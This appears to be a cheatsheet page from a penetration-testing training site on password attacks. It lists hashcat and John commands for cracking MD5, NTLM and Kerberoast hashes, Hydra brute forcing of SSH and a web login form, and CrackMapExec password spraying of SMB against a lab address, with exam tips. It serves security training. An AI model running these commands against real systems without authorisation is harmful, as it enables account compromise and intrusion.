Password Attacks
Exploitation
Overview
Techniques for password cracking, brute forcing, and credential attacks.
2
Exercises
4
Flashcards
1
Mind Maps
Cheatsheet
Hashcat
hashcat -m 0 hash.txt wordlist.txt # Crack MD5 hashes hashcat -m 1000 ntlm.txt rockyou.txt # Crack NTLM hashes hashcat -m 13100 krb5tgs.txt wordlist.txt # Crack Kerberoast TGS hashes
John
john --wordlist=rockyou.txt hash.txt # Crack hashes with John john --show hash.txt # Show cracked passwords
Hydra
hydra -l admin -P wordlist.txt ssh://10.10.10.5 # Brute force SSH hydra -L users.txt -P pass.txt 10.10.10.5 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid" # Brute force web form
CrackMapExec
crackmapexec smb 10.10.10.5 -u user -p password # Test SMB credentials crackmapexec smb 10.10.10.5 -u users.txt -p passwords.txt # Password spray SMB
Command Examples
Common Pitfalls
- Account lockouts
- Using wrong hash mode
Exam Survival Tips
- Try password spraying
- Check for password reuse